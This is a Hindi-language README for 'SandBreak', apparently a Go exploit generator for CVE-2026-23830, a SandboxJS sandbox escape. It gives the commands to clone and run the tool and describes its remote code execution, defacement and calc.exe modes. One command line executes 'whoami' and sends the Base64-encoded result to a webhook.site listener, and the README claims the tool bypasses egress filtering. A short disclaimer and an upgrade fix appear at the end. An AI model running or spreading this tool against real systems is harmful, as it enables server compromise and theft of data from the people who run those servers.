
CVE-2026-23830 के लिए एक्सप्लॉइट पेलोड उत्पन्न और वितरित करता है, जो एक SandboxJS एस्केप है, जिसमें ब्लाइंड OOB एक्सफिल्ट्रेशन और लोकल कैल्क PoC के लिए मोड शामिल हैं। HTTP/HTTPS लिसनर का समर्थन करता है और मिनिफाइड JavaScript पेलोड उत्पन्न करता है।
SandBreak एक मजबूत, Go-आधारित एक्सप्लॉइट जनरेटर है जिसे SandboxJS Escape भेद्यता (CVE-2026-23830) का लाभ उठाने के लिए डिज़ाइन किया गया है।
यह टूल sandboxjs के पुराने संस्करणों में असुरक्षित AsyncFunction कंस्ट्रक्टर का शोषण करता है, जिससे हमलावर V8 सैंडबॉक्स वातावरण से बाहर निकलकर होस्ट सिस्टम पर मनमाना कोड निष्पादित कर सकते हैं। यह कई पेलोड मोड का समर्थन करता है, जिनमें ब्लाइंड OOB एक्सफिल्ट्रेशन, डिफेसमेंट, और एरर-आधारित RCE शामिल हैं।
oob: ब्लाइंड परिदृश्यों के लिए आउट-ऑफ-बैंड डेटा एक्सफिल्ट्रेशन (HTTP/HTTPS)।calc: calc.exe पॉप करता है (क्लासिक PoC)।रिपॉजिटरी को क्लोन करें और चलाएँ:
git clone https://github.com/Galaxy-sc/CVE-2026-23830-SandBreak.git
cd CVE-2026-23830-SandBreak
go run CVE-2026-23830.go
go run CVE-2026-23830.go -mode [MODE] -cmd [COMMAND] [OPTIONS]
इसका उपयोग तब करें जब आपके पास कोई आउटपुट फीडबैक न हो। यह कमांड निष्पादित करता है और Base64-एन्कोडेड परिणाम को आपके लिसनर (जैसे, webhook.site) पर भेजता है।
go run CVE-2026-23830.go -mode oob -cmd "whoami" -url "https://webhook.site/YOUR-UUID"
नेटवर्क त्रुटियों को संभालकर बुनियादी ईग्रेस फ़िल्टरिंग क्रैश को सफलतापूर्वक बायपास करता है।
Windows सर्वर पर कैलकुलेटर पॉप करता है।
go run CVE-2026-23830.go -mode calc
साइट पर कोई विज़ुअल आउटपुट न होने के बावजूद हमलावर Webhook के माध्यम से सर्वर का उपयोगकर्ता डेटा प्राप्त कर रहा है।
यह टूल केवल शैक्षिक उद्देश्यों और अधिकृत पेनेट्रेशन टेस्टिंग के लिए बनाया गया है।
sandboxjs को नवीनतम संस्करण में अपग्रेड करें जहाँ AsyncFunction कंस्ट्रक्टर को ठीक से सैंडबॉक्स किया गया है।
npm update sandboxjs
लेखक: Meysam Bal-afkan
लाइसेंस: MIT